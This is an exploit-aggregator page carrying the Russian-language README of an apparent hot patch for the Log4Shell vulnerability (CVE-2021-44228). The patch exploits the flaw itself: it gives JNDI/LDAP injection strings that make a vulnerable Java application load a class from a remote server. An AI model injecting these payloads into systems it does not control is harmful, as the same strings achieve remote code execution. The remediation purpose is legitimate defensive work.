Sploitus

Exploit for cve-2021-44228-qingteng-online-patch

kitploit · 2026-08-25

Exploit Code

MARKDOWN30 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-QINGTENGYUN-CVE-2021-44228-QINGTENG-ONLINE-PATCH
# cve-2021-44228-qingteng-online-patch

## Что это

Горячий патч для CVE-2021-44228, использующий саму уязвимость.

## Использование

Вставьте следующий код в любое место, которое, вероятно, уязвимо к CVE-2021-44228,

root@kitploit:~
    
    
    ${jndi:ldap://your-own-server/patch}
    

Чтобы предотвратить MITM-атаку во время процесса установки патча, рекомендуется следующий payload, но он менее совместим со старыми версиями Java,

root@kitploit:~
    
    
    ${jndi:ldap://your-own-server/any_string_except_patch}
    

## Запуск собственного сервера

  1. Скачайте последние релизы

  2. Если вы хотите размещать Hotfix.class на собственном сервере, укажите системные переменные окружения `LOG4J_HOTFIX_HTTP_PATH` и `LOG4J_HOTFIX_HTTPS_PATH`